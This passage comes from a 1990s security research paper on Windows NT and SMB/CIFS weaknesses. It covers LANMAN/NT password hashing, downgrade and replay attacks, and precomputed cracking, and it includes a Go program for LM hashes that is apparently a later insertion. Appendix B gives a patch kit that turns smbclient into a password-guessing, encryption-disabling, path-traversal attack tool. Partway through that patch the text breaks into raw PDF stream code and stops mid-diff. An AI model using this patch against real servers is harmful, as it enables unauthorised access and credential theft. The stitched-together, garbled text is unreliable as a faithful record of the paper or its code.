Apparently there is support for Kerberos 5 authentication on the drawing board
for NT, if not in alpha by now.
As far as I know Microsoft contributed
nothing to the Krb5 development effort themselves, so why Krb5? Ostensibly to
support DCE, but more realistically because Microsoft can just swipe the MIT
code now that it has been well-tested and officially released. It remains to
be seen whether this will be a full implementation, with perhaps an NT-based
KDC server?? I can't wait to see how badly *that* gets mangled, especially
when handling backward compatibility. Naturally some of the first things to
rip into will be random number generation and client storage of tickets. Will
we finally see some server-end enforcement of authentication types? Will
clients implement preauthenticated TGT requests, or be able to perform mutual
authentication to exchange keys for encrypted sessions? Not likely, since
CIFS seems to imply that Microsoft is banking on the eventual deployment of
IPSEC instead. Here again, they take the easy way out instead of actively
helping implement secure protocols. It's just as well, really, since if CIFS
is any example they would probably screw it up at the standards level and set
everyone else back.

Default settings on even the latest NT server are still laughable, as are most
of its responses under attack. Okay, so they turned off the NT4.0 GUEST
account by default after significant public humiliation, but why stop there?
Creating a new fileshare *still* lays it wide open to the "Everyone" group,
unless several obscure menu layers are waded through to reset the ACLs. This
still does not prevent the "Everyone" group from *deleting* arbitrary files
unless yet another service pack has been applied. There is little enforcement
for good passwords. All security auditing is still disabled until the
administrator turns it on and makes an effort to prevent it from filling up
and becoming useless -- and the logging still has little value in the WAN
environment. Already there is talk of potentially egregious weaknesses in
various interactions like domain password changing and interdomain trust
relationships. Microsoft apparently made the ".." mistake in ALL their OS
offerings, from WFWG up to the vaunted NT 3.51. It took a lynch mob to
convince them to fix it, and it's *still* popping up here and there in other
add-on products. And we won't even talk about some of those add-ons, which
already have been shown to fall over when lightly tickled, or allow full
read/write file access to completely unauthenticated users.

We can and should honestly ask, what *are* they thinking out there in Redmond?
Besides the usual complaints about unstable bloatware, we are starting to see
a steady stream of stupid, naive ten year old security problems, from weak
so-called encryption of .PWL files on up. The answers usually consist of
denial and refusing to fix the flaws, and only under tremendous pressure
does anything get done. Is this the same vendor we are supposed to trust
to produce an operating system and network suite as "secure" as is claimed
for NT, especially when it is held forth as a *replacement* for Unix? Are
we to lay large amounts of tithe at the feet of the Golden Gates for a
complex behemoth that we are repeatedly reassured [read: lied to] is robust
under fire, but continues to fall for the same old stupid reasons? The
Internet security community is now pushing two decades of finding those little
headache-producing bonus gifts that come with major vendor-supplied OSes. One
would surely think that a relative newcomer in that arena would take the time
to learn from all those well-documented mistakes and make some effort to avoid
them, but no, here we go 'round again. This stuff is *not* technically ready
for prime time in today's internet, but is being brutally pressed into service
for the sake of the bottom line.
Common sense screams "run away", and we can
easily anticipate another decade of nasty holes that will undoubtedly turn up
and be promptly swept under the rug by hordes of marketroids whose jobs are
*not* particularly dependent on secure, robust computing environments.

No thank you, I'd rather not go *there* today.

It will be interesting to see if the trade press picks up on any of this.
If past experience is any indicator they will simply color the whole issue
yellow, denounce Samba as a cracker tool while defending poor widdle abused
Microsoft, and as usual not help anyone address the real problems.

Conclusions
===========

By now the reader may be thinking twice before replacing all those Unix
servers with NT, and considering the significant risks in yielding to all that
marketing rah-rah. In general we now see, in what is hoped to be a clearer
way than previously, both how and why to check networks for these additional
vulnerabilities. Unix may have its own problems, but overall it is still
easier to secure and verify for correctness, and is largely free with all
sources included. There are many good people out there proactively finding
and fixing Unix problems on a daily basis. And as detailed in this document,
Unix still has plenty of fight in it to help kick the NT monster in the ass.

The question remaining is, has this document helped at all, or is it just
another rework of old information? It began to take shape under the distinct
feeling that the research involved *must* have been long since done already,
given today's ubiquity of SMB environments, and that it would appear about as
timely as discussion of Morris worm holes. But as more sources were scanned,
many of the relevant points just didn't seem to be there or were buried as
vague hints or hearsay in unrelated discussions. Again, the intent is to
simply present this information in a cohesive and useful way, warn against
some clear and present risks, and plant seeds to foster future work.

References and acknowledgements
===============================

This is an independent research effort of Avian Research, and is presented
to the Internet community in the hope that it will be educational and
useful. Nearly all the information utilized was obtained via groping
around on the internet, and is referenced largely in that context.

Early stages of the project were partially funded by Secure Networks, Inc. of
Calgary, CA. They have recently released a greatly enhanced NetBIOS security
scanner that embodies many of the concepts described here. Also Samba-based,
it is now available via FTP at ftp.secnet.com:/pub/tools/nat10.

Possibly the most instructive document is the CIFS spec, which can be found at
www.internic.net:/internet-drafts/draft-heizer-cifs-v1-spec-00.txt. The spec
for NetBIOS over TCP is in RFC1001 and RFC1002, available at any RFC
repository. Another important source is of course the Samba suite, from
nimbus.anu.edu.au:/pub/tridge/samba and numerous mirror sites. The "old-
versions" subdirectory thereof should contain version 1.9.15p8 of the code.

Microsoft's "knowledge base" contains lots of fairly good, albeit rather
sanitized, information via FTP or the web. The NT articles are summarized
in ftp.microsoft.com:/bussys/winnt/kb/index.txt, which is possibly the best
starting point. The Microsoft resource kits are another reference source that
could possibly have answered more questions, but were unavailable at the time
and therefore *not* consulted.

Many security practitioners are collecting information about problems in
Microsoft products. The "hack Microsoft" page at www.c2.org:/hackmsoft/
is a good example, as is the information that Somarsoft makes available at
www.somarsoft.com:/security.htm and related items. Details about problems
in the IIS web server and related things are up for grabs at www.omna.com.

As NT specifically loomed larger as a problem area during data collection,
many NT-specific references came to light.
It has been VERY difficult to
avoid diving down the thousands of potential ratholes involved with closer
investigation of NT. An email exchange with Tom Sheldon, initially concerning
a reference to Netcat he wanted to add to his book, got us talking. The
book is now out: "Windows NT Security Handbook" [680 pages, 0-07-882240-8,
$34.99US]. Helpful tidbits of information came from this, along with many
more from Tom's very informational site at www.ntresearch.com. Several
papers, articles, and checklists are available there. Another site that is
also beginning to make several NT *tools* [notably NTFSDOS] available is
www.ntinternals.com, run by Mark Russinovich and Bryce Cogswell.

The archive of the NT-security mailing list is overwhelmingly HUGE by now, and
lives at ftp.iss.net:/pub/lists/ntsecurity-digest.archive/. Nevertheless, the
bulk of it was pulled down and at least searched for relevant items if not
read outright. ISS also maintains some vulnerability databases and security
checklists. The mailing list appears to be useful, and frequently points to
other sources on NT security. Here are some of them. They do not all appear
to have titles or authors; some are just random web pages that may have more
than one maintainer.

   An Overview of Windows NT Security, by Jim Frost, May 4, 1995
   world.std.com:/~jimf/nt-security.html

   A comprehensive collection of pointers to other NT security resources
   is taking shape at www.it.kth.se/~rom/ntsec.html.

   Bill Stout posted a paper comparing NT vs. Unix network security, last seen
   at www.hidata.com:/guest/whitepapers/NTsec.htm. It may have moved since.

Bruce Schneier should of course be mentioned, whose "Applied Cryptography"
presents a very clear picture of using crypto properly. Laurent Joncheray
presented his interesting paper on the "desync" TCP attack at the 1995 Usenix
Security conference. Random items have been plucked out of various mailing
lists like NTSEC and Firewalls along the way, specific references to which
were never saved. Those wonderful wackos who maintain www.L0pht.com have
been extremely supportive of the ongoing research, and are also starting to
make some interesting tools and examples available. Dominique Brezinski at
cybersafe.com was helpful in some private mail, and John Hood sent several
last-minute edits.

Thanks go out in general to those folks in the Internet security community
with that no-bullshit approach, who do not hold back with getting problems
out where everyone can help examine and solve them on a timely basis.

Appendix A: Crypto
==================

There are two algorithms used to cryptographically secure the authentication
data between a user and a server. The earlier LANMAN-compatible algorithm
uppercases the password, truncates or pads to 14 characters as needed, and
derives therefrom a pair of odd-parity DES keys to ECB-encrypt a fixed 8-byte
quantity described in CIFS as "available from Microsoft upon request" but
already well-known to be the decryption of 0xAAD3B435B51404EE with a key of
all zeros. The second method is currently supported by NT and Samba, which
preserves the case of the password up to 128 bytes, converts it to unicode,
and runs the result through MD4. Each algorithm outputs 16 bytes of
cryptographic hash that securely represents the user's password. These 16
bytes are called "OWF passwords" from the associated one-way function, and are
stored in registries and Samba's alternate "smbpasswd" file. Smbencrypt.c
in conjunction with the "libdes" routines handles most of this.
For challenge response, five more nulls are appended to either hash type and
the 21 total bytes used as a key triple to DES encrypt the 8-byte challenge
into three separate output blocks. The final 24-byte output of this process
is sent in the SMB in place of the plaintext password. The password length
normally sits at parameter word smb_vwv7 as Samba builds the block, and the
buffer area farther along contains the response bytes. Under NT LM dialect
there are two password fields -- one for the all-uppercase LANMAN-compatible
password or hash thereof and one for the case-sensitive NT-style equivalent.
The lengths sit at smb_vwv7 and smb_vwv8 respectively, and the corresponding
data buffers are consecutive. NT clients by default fill both buffers with
the two types of encrypted 24-byte responses. If told to use plaintext
passwords, the NT client only sends a LANMAN password in smb_vwv7 but in
*mixed* case.

This is open to more than one easy man-in-the-middle attack. One is even
documented in CIFS as the "downgrade attack", wherein a fake server response
tells a client to use observable cleartext passwords. Since the fake response
packet only needs one changed payload bit and different checksums, this attack
is undetectable since a later real response is simply discarded by the TCP
transport. A more interesting attack involves taking the cryptkey from one
session and network-spoofing it into a victim's later one; the victim's
resulting 24-byte response is used to authenticate the first session instead.
Here, CIFS makes the cryptographically naive error of letting the client user
"sign" the arbitrary data in the cryptkey instead of a hash that includes it.

The application user interfaces in general encourage the historically bad
practice for all users to choose the same password across many different
machines, even across different NT domains. This is held forth as a single-
sign-on model, but standard elements of a real SSO system such as time-limited
session credentials never enter the picture at all. The implementation also
is in many ways too restrictive for most real-world environments. How does
one go about the sounder practice of having separate accounts for separate
machines or groups thereof? Some utilities will ask for another password
and try again if the cached login password isn't correct for a different
server, but this doesn't work everywhere. Example: The NT "net" utility
accepts a "/USER:othername" switch when doing a "net use", but not when doing
a "net view". Remote registry editing and related tools first try to use the
credentials from the console login, and if that doesn't work either ask for an
alternate password or simply fail. Sometimes a way to specify a completely
alternate login is necessary, but NT's designers seem to have ignored this
and not even provided a global "net logon" facility like under WFWG. Often
one is forced to create new local accounts and passwords, or use some other
band-aid workaround, just to authenticate some underdesigned application to a
remote system.

The OWF hashes do not directly reveal a user's plaintext password but if
somehow obtained, can be directly used for authentication as well as input to
an offline dictionary attack. Directly storing them therefore reduces the
security to about the level of burying plaintext passwords inside scripts and
thinking "well, the script is hidden, so the password is safe." Microsoft
tries to crock around this recognized decades-old problem by re-encrypting
the hashes under some *other* key that is often stored in some obscure but
nonetheless findable place. Authentication information is also cached in
various places such as .PWL files and registry entries, to support the
"automatic drive reconnect" stuff. NT apparently also stores information
about the last ten domain-level user logons in the registry, for use in cases
when the PDC is unreachable.

Since there is no salting in the OWF transform, even the generic old Unix
crypt() algorithm is stronger than this scheme. An entire dictionary's worth
of passwords and permutations thereof can be *precomputed* and stored, which
reduces an OWF dictionary attack to a big database lookup. The block-mode ECB
encryption scheme further implies that only the first 8 bytes of the OWF hash
really need to be saved; a successful 8-byte match not only brackets a greatly
reduced dictionary segment, it directly reveals the first seven characters of
a LANMAN-style password. Related to this is that the challenge-response
protocol also uses simple ECB of a known plaintext with no chaining or
feedback. Response keys derived from the OWF are invariant and can be
similarly precomputed. The first stage of an attack on a recorded session
setup only requires the cryptkey and the first 8 bytes from both the
precomputed response dictionary and the 24-byte response, and DES encryption
of a single block determines whether to bother with the remaining two. Again,
cracking just the first block can index down to a much smaller chunk of the
dictionary.
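To make the Appendix A derivation concrete, the following is an added example (not code from this paper or from Samba) that computes the LANMAN OWF hash and the 24-byte challenge response with Go's standard crypto/des, and then checks the two structural weaknesses just described: the two hash halves are independent, and each response block depends on only 7 bytes of the hash. The challenge value 0123456789abcdef and the sample passwords are constructed; the NT-style MD4 OWF is left out because MD4 is not in Go's standard library, but the response step is identical for it.

```go
// Added example: LANMAN OWF hash and LM challenge response, as described in
// Appendix A. Not code from the paper or from Samba; uses Go's crypto/des.
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
)

// desKeyFrom7 spreads 7 key bytes (56 bits) over 8 DES key bytes, 7 bits per
// byte, and sets the low bit of each byte for odd parity, as LANMAN does.
func desKeyFrom7(k7 []byte) []byte {
	var acc uint64
	for _, b := range k7[:7] {
		acc = acc<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		b := byte(acc&0x7f) << 1 // next 7 bits, consumed from the low end
		if bits.OnesCount8(b)%2 == 0 {
			b |= 1 // odd parity
		}
		key[i] = b
		acc >>= 7
	}
	return key
}

// desEncryptBlock ECB-encrypts one 8-byte block under a 7-byte LANMAN key.
func desEncryptBlock(key7, block []byte) []byte {
	c, err := des.NewCipher(desKeyFrom7(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmMagic recovers the "available upon request" constant exactly as the paper
// says: DES-decrypt 0xAAD3B435B51404EE under an all-zero key.
func lmMagic() []byte {
	c, _ := des.NewCipher(make([]byte, 8))
	ct, _ := hex.DecodeString("aad3b435b51404ee")
	pt := make([]byte, 8)
	c.Decrypt(pt, ct)
	return pt
}

// lmHash: uppercase (ASCII only here), pad or truncate to 14 bytes, split into
// two 7-byte DES keys, ECB-encrypt the fixed magic block with each. No salt.
func lmHash(password string) []byte {
	buf := make([]byte, 14)
	copy(buf, strings.ToUpper(password)) // copy stops at 14 bytes
	magic := lmMagic()
	return append(desEncryptBlock(buf[0:7], magic), desEncryptBlock(buf[7:14], magic)...)
}

// lmResponse: 16-byte OWF hash plus 5 nulls gives 21 bytes, used as three
// DES keys that each ECB-encrypt the same 8-byte server challenge (cryptkey).
func lmResponse(hash, challenge []byte) []byte {
	key21 := make([]byte, 21)
	copy(key21, hash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncryptBlock(key21[i*7:i*7+7], challenge)...)
	}
	return resp
}

// firstBlockDependsOnlyOnHashPrefix checks the property the paper relies on:
// response bytes 0..7 are a function of hash bytes 0..6 alone, so a recorded
// session can be tested one DES block at a time. Flipping a byte that feeds
// only the third key must leave block 1 intact and change block 3.
func firstBlockDependsOnlyOnHashPrefix(hash, challenge []byte) bool {
	altered := append([]byte{}, hash...)
	altered[15] ^= 0xff
	a, b := lmResponse(hash, challenge), lmResponse(altered, challenge)
	return bytes.Equal(a[:8], b[:8]) && !bytes.Equal(a[16:], b[16:])
}

func main() {
	challenge, _ := hex.DecodeString("0123456789abcdef") // constructed cryptkey
	fmt.Printf("magic plaintext: %q\n", lmMagic())
	for _, p := range []string{"", "passwor", "password"} {
		fmt.Printf("LM(%q) = %x\n", p, lmHash(p))
	}
	h := lmHash("password")
	fmt.Printf("LM response = %x\n", lmResponse(h, challenge))
	fmt.Println("block 1 fixed by 7-byte hash prefix:", firstBlockDependsOnlyOnHashPrefix(h, challenge))
}
```

The output shows LM("passwor") and LM("password") sharing their first 8 bytes, and LM("passwor") sharing its last 8 bytes with the empty password, which is the "first seven characters" leak in action.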
Under NT LM dialect, NT clients usually send *both* response
types in the SetupAndX, which again defeats the whole purpose of the NT style
password since cracking the plaintext of the reduced keyspace LANMAN password
can serve as a template for cracking the user's "real" NT password.

Normally the SAM registry section on an NT server is protected against
reading. An administrator can nonetheless take ownership of the whole SAM
hive, and dump out various subkeys under Domains\Account\Users\{hex-values}.
It is fairly clear from diffing ASCII hive dumps that the 32 bytes at the end
of the respective "V" binary blocks correspond to OWF password storage. We
can observe corresponding changes to at least the same-length fields in the
Samba "smbpasswd" file. The 32 bytes represent the LANMAN and NT OWF hashes,
but on NT are re-encrypted under some other set of keys. Attempts to find
these meta-keys by trying likely-looking DES-size blocks elsewhere around the
registry have thus far failed, but the answer may be discoverable with a
little more effort. Anyone who already knows the true magic here is of course
encouraged to speak up, even if anonymously.

Inter-domain trust relationships are another NT-specific issue and were not
studied here, but surely need to be investigated more closely. Various
documentation mentions that a "secure channel" is established between domain
controllers using the special DOMAIN$ accounts and some kind of "secret
object" which apparently is often derived from a human-chosen password. The
channel is apparently an RPC session, but is it truly encrypted, and if so,
how? Would this imply that some mechanism for encrypted SMB does exist after
all, but for some reason is not made available to the end users? What about
backup domain-controller replication, which implies that one machine can suck
down the entire SAM database of another? How about an analysis of encryption
across PPTP VPNs? Someone else may be able to answer these questions too.

Appendix B: The Patch Kit
=========================

This illustrates some minimal changes needed to turn smbclient into a
rudimentary attack kit. It does not cover *every* possibility of protocol
weakness by any means, but is enough to get going with some fairly serious
host-level attacks.
Briefly, the following changes are effected:

   Adds the interpret_error routine to help straighten out server errors

   Corrects conversion of security mode

   Loops forever reading new trial passwords from standard input

   No-ops out the dos_clean_name() path cleanup routine, and allows
   changing to what appear to be "bad" directory paths.

   Fixes nmblookup to use local UDP port 137 and verbatim scope ID

Apply the patch using your favorite method for doing so; extracting it to a
file and doing "patch < file" generally suffices. Configure the Makefile for
your platform, and add -DATTACK to FLAGS1. If you want all passwords
automatically uppercased, also add -DUPPERCASE. This is optional, since
mixed-case passwords are sometimes needed. Don't define PASSWD_FLAGS, so the
client cannot use password encryption. Finally, do "make smbclient nmblookup"
to build the two programs.

These changes are decidedly quick and dirty, but should illustrate how to
begin putting together a much more sophisticated tool. Looking a little
farther forward immediately shows several improvements not implemented here:
The send_login routine covers three important steps in one linear shot and
should be split up into its logically separate SMB steps. Several more
commands can be added, to swap between arbitrary sharenames, UIDs, TIDs and
other possibly relevant parameters. Overall, the entire breakin scenario
can be highly automated.

 !-- chop --!

*** client.c Mon Jan 15 03:56:44 1996
--- attack/client.c Thu Jan 30 23:14:59 1997
***************
*** 80,81 ****
--- 80,152 ----
 
+ /* Avian Research demo "SMBAttack" patch kit. _H*/
+ #ifdef ATTACK
+ unsigned int cur_err;
+ 
+ #define dos_clean_name donothing
+ void donothing () { return; }
+ 
+ #define getpass readpass
+ char * readpass (prompt)
+ char * prompt;
+ {
+ char pb [256];
+ char * pp = NULL;
+ 
+ DEBUG(1,(prompt));
+ pp = fgets (pb, 128, stdin);
+ if (feof (stdin)) exit (0);
+ if (pp) {
+ pp [(strlen (pp) - 1)] = '\0'; /* rip the newline */
+ #ifdef UPPERCASE
+ strupper (pp); /* maybe upcase it? XXX */
+ #endif
+ strcpy (password, pp); /* and save it */
+ }
+ return (pp);
+ } /* readpass */
+ 
+ /****************************************************************************
+ The error returns from various platforms are many and varied, but all of
+ them mean a couple of basic things. This boils relevant ones down roughly
+ to common server-class status, i.e.:
+ 0 success
+ 2 access denied, or wrong username/passwd for session OR share
+ 5 network-ID not found, for session
+ 6 sharename not found, TCon problem
+ 1 anything else, probably fatal, including disabled accounts,
+ negotiation problems, etc
+ ****************************************************************************/
+ static int interpret_error (rcls, err)
+ unsigned char rcls;
+ uint16 err;
+ {
+ if ((rcls == 0) && (err == 0)) return (0); /* no error */
+ if (rcls == ERRSRV) {
+ if (err == 1) return (1); /* non-specific error
*/) Tj 1 0 0 1 54 491.4 Tm (+ if \(err == 2\) return \(2\); /* bad name or password */) Tj 1 0 0 1 54 480.9 Tm (+ if \(err == 4\) return \(1\); /* insufficient access for function */) Tj 1 0 0 1 54 470.4 Tm (+ if \(err == 5\) return \(5\); /* invalid TID */) Tj 1 0 0 1 54 459.9 Tm (+ if \(err == 6\) return \(6\); /* invalid network name */) Tj 1 0 0 1 54 449.4 Tm (+ if \(err == 7\) return \(6\); /* invalid device */) Tj 1 0 0 1 54 438.9 Tm (+ if \(err == 1311\) return \(1\); /* no login servers available [?] */) Tj 1 0 0 1 54 428.4 Tm (+ if \(err == 2239\) return \(1\); /* account expired or disabled */) Tj 1 0 0 1 54 417.9 Tm (+ } /* ERRSRV */) Tj 1 0 0 1 54 407.4 Tm (+ if \(rcls == ERRDOS\) {) Tj 1 0 0 1 54 396.9 Tm (+ if \(err == 5\) return \(2\); /* access denied */) Tj 1 0 0 1 54 386.4 Tm (+ if \(err == 65\) return \(1\); /* network access denied */) Tj 1 0 0 1 54 375.9 Tm (+ if \(err == 67\) return \(6\); /* network name not found */) Tj 1 0 0 1 54 365.4 Tm (+ if \(err == 71\) return \(1\); /* no more connections */) Tj 1 0 0 1 54 354.9 Tm (+ if \(err == 86\) return \(2\); /* network password incorrect */) Tj 1 0 0 1 54 344.4 Tm (+ if \(err == 87\) return \(1\); /* parameter incorrect */) Tj 1 0 0 1 54 333.9 Tm (+ if \(err == 90\) return \(1\); /* too many UIDs */) Tj 1 0 0 1 54 323.4 Tm (+ /* XXX: the rest of these might be ERRSRVs too -- all return 1 anyways, so wtf. 
*/) Tj 1 0 0 1 54 312.9 Tm (+ if \(err == 2240\) return \(1\); /* access denied from this WS */) Tj 1 0 0 1 54 302.4 Tm (+ if \(err == 2241\) return \(1\); /* access denied at this time */) Tj 1 0 0 1 54 291.9 Tm (+ if \(err == 2242\) return \(1\); /* password expired */) Tj 1 0 0 1 54 281.4 Tm (+ if \(err == 2247\) return \(1\); /* security database corrupted */) Tj 1 0 0 1 54 270.9 Tm (+ if \(err == 2455\) return \(1\); /* invalid workgroup */) Tj 1 0 0 1 54 260.4 Tm (+ } /* ERRDOS */) Tj 1 0 0 1 54 249.9 Tm (+ return \(1\); /* didn't find any mapping */) Tj 1 0 0 1 54 239.4 Tm (+ } /* interpret_error */) Tj 1 0 0 1 54 228.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 218.4 Tm ( ) Tj 1 0 0 1 54 207.9 Tm (***************) Tj 1 0 0 1 54 197.4 Tm (*** 171,172 ****) Tj 1 0 0 1 54 186.9 Tm (--- 242,247 ----) Tj 1 0 0 1 54 176.4 Tm ( SSVAL\(outbuf,smb_flg2,0x1\);) Tj 1 0 0 1 54 165.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 155.4 Tm (+ SCVAL\(outbuf,smb_flg,0x18\); /* already-canonical filenames */) Tj 1 0 0 1 54 144.9 Tm (+ SSVAL\(outbuf,smb_flg2,0x2001\); /* execute perm == read perm [?] 
*/) Tj 1 0 0 1 54 134.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 123.9 Tm ( }) Tj 1 0 0 1 54 113.4 Tm (***************) Tj 1 0 0 1 54 102.9 Tm (*** 282,283 ****) Tj 1 0 0 1 54 92.4 Tm (--- 357,364 ----) Tj 1 0 0 1 54 81.9 Tm ( ) Tj ET Q endstream endobj 182 0 obj 4538 endobj 177 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R180 180 0 R >> >> /Contents [ 178 0 R 181 0 R ] >> endobj 184 0 obj << /Length 185 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 185 0 obj 48 endobj 186 0 obj << /Type /Font /Name /R186 /Subtype /Type1 /BaseFont /Courier >> endobj 187 0 obj << /Length 188 0 R >> stream BT /R186 10 Tf 1 0 0 1 54 711.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 701.4 Tm (+ /* we don't care if it's a bad path or not */) Tj 1 0 0 1 54 690.9 Tm (+ if \(report && CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 680.4 Tm (+ DEBUG\(2,\(" [but continuing anyway]\\n"\)\);) Tj 1 0 0 1 54 669.9 Tm (+ return \(True\);) Tj 1 0 0 1 54 659.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 648.9 Tm ( return\(CVAL\(inbuf,smb_rcls\) == 0\);) Tj 1 0 0 1 54 638.4 Tm (***************) Tj 1 0 0 1 54 627.9 Tm (*** 447,450 ****) Tj 1 0 0 1 54 617.4 Tm (--- 528,533 ----) Tj 1 0 0 1 54 606.9 Tm ( strcpy\(dname,cur_dir\);) Tj 1 0 0 1 54 596.4 Tm (+ #ifndef ATTACK) Tj 1 0 0 1 54 585.9 Tm ( strcat\(cur_dir,"\\\\"\);) Tj 1 0 0 1 54 575.4 Tm ( dos_clean_name\(cur_dir\);) Tj 1 0 0 1 54 564.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 554.4 Tm ( ) Tj 1 0 0 1 54 543.9 Tm (***************) Tj 1 0 0 1 54 533.4 Tm (*** 834,837 ****) Tj 1 0 0 1 54 522.9 Tm ( if \(CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 512.4 Tm ( return\(False\);) Tj 1 0 0 1 54 501.9 Tm (! 
) Tj 1 0 0 1 54 491.4 Tm ( /* parse out the lengths */) Tj 1 0 0 1 54 480.9 Tm (--- 917,927 ----) Tj 1 0 0 1 54 470.4 Tm ( if \(CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 459.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 449.4 Tm (+ /* show us why */) Tj 1 0 0 1 54 438.9 Tm (+ {) Tj 1 0 0 1 54 428.4 Tm (+ DEBUG \(0,\("Trans failed: %s\\n", smb_errstr \(inbuf\)\)\);) Tj 1 0 0 1 54 417.9 Tm (+ return \(False\);) Tj 1 0 0 1 54 407.4 Tm (+ }) Tj 1 0 0 1 54 396.9 Tm (+ #else) Tj 1 0 0 1 54 386.4 Tm ( return\(False\);) Tj 1 0 0 1 54 375.9 Tm (! #endif /* ATTACK */) Tj 1 0 0 1 54 365.4 Tm ( /* parse out the lengths */) Tj 1 0 0 1 54 354.9 Tm (***************) Tj 1 0 0 1 54 344.4 Tm (*** 3014,3016 ****) Tj 1 0 0 1 54 333.9 Tm ( ) Tj 1 0 0 1 54 323.4 Tm (! DEBUG\(3,\("Sec mode %d\\n",SVAL\(inbuf,smb_vwv1\)\)\);) Tj 1 0 0 1 54 312.9 Tm ( DEBUG\(3,\("max xmt %d\\n",max_xmit\)\);) Tj 1 0 0 1 54 302.4 Tm (--- 3104,3106 ----) Tj 1 0 0 1 54 291.9 Tm ( ) Tj 1 0 0 1 54 281.4 Tm (! DEBUG\(3,\("Sec mode %d\\n",sec_mode\)\); /* fixt. 
_H*/) Tj 1 0 0 1 54 270.9 Tm ( DEBUG\(3,\("max xmt %d\\n",max_xmit\)\);) Tj 1 0 0 1 54 260.4 Tm (***************) Tj 1 0 0 1 54 249.9 Tm (*** 3020,3021 ****) Tj 1 0 0 1 54 239.4 Tm (--- 3110,3119 ----) Tj 1 0 0 1 54 228.9 Tm ( doencrypt = \(\(sec_mode & 2\) != 0\);) Tj 1 0 0 1 54 218.4 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 207.9 Tm (+ /* don't encrypt, period */) Tj 1 0 0 1 54 197.4 Tm (+ doencrypt = 0;) Tj 1 0 0 1 54 186.9 Tm (+ /* don't screw with SessSetupX step unless we genuinely need it */) Tj 1 0 0 1 54 176.4 Tm (+ use_setup = \(\(sec_mode & 1\) != 0\);) Tj 1 0 0 1 54 165.9 Tm (+ /* always read a password anyways */) Tj 1 0 0 1 54 155.4 Tm (+ got_pass = 0;) Tj 1 0 0 1 54 144.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 134.4 Tm ( ) Tj 1 0 0 1 54 123.9 Tm (***************) Tj 1 0 0 1 54 113.4 Tm (*** 3103,3104 ****) Tj 1 0 0 1 54 102.9 Tm (--- 3201,3211 ----) Tj 1 0 0 1 54 92.4 Tm ( ) Tj 1 0 0 1 54 81.9 Tm (+ #ifdef ATTACK) Tj ET Q endstream endobj 188 0 obj 3113 endobj 183 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R186 186 0 R >> >> /Contents [ 184 0 R 187 0 R ] >> endobj 190 0 obj << /Length 191 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 191 0 obj 48 endobj 192 0 obj << /Type /Font /Name /R192 /Subtype /Type1 /BaseFont /Courier >> endobj 193 0 obj << /Length 194 0 R >> stream BT /R192 10 Tf 1 0 0 1 54 711.9 Tm (+ cur_err = interpret_error \() Tj 1 0 0 1 54 701.4 Tm (+ CVAL \(inbuf, smb_rcls\), SVAL \(inbuf, smb_err\)\);) Tj 1 0 0 1 54 690.9 Tm (+ if \(cur_err == 2\) {) Tj 1 0 0 1 54 680.4 Tm (+ DEBUG \(2, \("session setup failed: %s\\n", smb_errstr \(inbuf\)\)\);) Tj 1 0 0 1 54 669.9 Tm (+ goto get_pass;) Tj 1 0 0 1 54 659.4 Tm (+ }) Tj 1 0 0 1 54 648.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 638.4 Tm (+ ) Tj 1 0 0 1 54 627.9 Tm ( if \(CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 617.4 Tm (***************) Tj 1 0 0 1 54 606.9 Tm (*** 3129,3130 ****) Tj 1 0 0 1 54 
596.4 Tm (--- 3236,3241 ----) Tj 1 0 0 1 54 585.9 Tm ( ) Tj 1 0 0 1 54 575.4 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 564.9 Tm (+ /* we're in */) Tj 1 0 0 1 54 554.4 Tm (+ DEBUG\(0,\("session established as %s/%s\\n", username, password\)\);) Tj 1 0 0 1 54 543.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 533.4 Tm ( if \(Protocol >= PROTOCOL_NT1\) {) Tj 1 0 0 1 54 522.9 Tm (***************) Tj 1 0 0 1 54 512.4 Tm (*** 3193,3194 ****) Tj 1 0 0 1 54 501.9 Tm (--- 3304,3313 ----) Tj 1 0 0 1 54 491.4 Tm ( ) Tj 1 0 0 1 54 480.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 470.4 Tm (+ cur_err = interpret_error \() Tj 1 0 0 1 54 459.9 Tm (+ CVAL \(inbuf, smb_rcls\), SVAL \(inbuf, smb_err\)\);) Tj 1 0 0 1 54 449.4 Tm (+ if \(cur_err == 2\) {) Tj 1 0 0 1 54 438.9 Tm (+ DEBUG \(2, \("TCon failed: %s\\n", smb_errstr \(inbuf\)\)\);) Tj 1 0 0 1 54 428.4 Tm (+ goto get_pass;) Tj 1 0 0 1 54 417.9 Tm (+ }) Tj 1 0 0 1 54 407.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 396.9 Tm ( /* trying again with a blank password */) Tj 1 0 0 1 54 386.4 Tm (***************) Tj 1 0 0 1 54 375.9 Tm (*** 3217,3219 ****) Tj 1 0 0 1 54 365.4 Tm ( ) Tj 1 0 0 1 54 354.9 Tm (! ) Tj 1 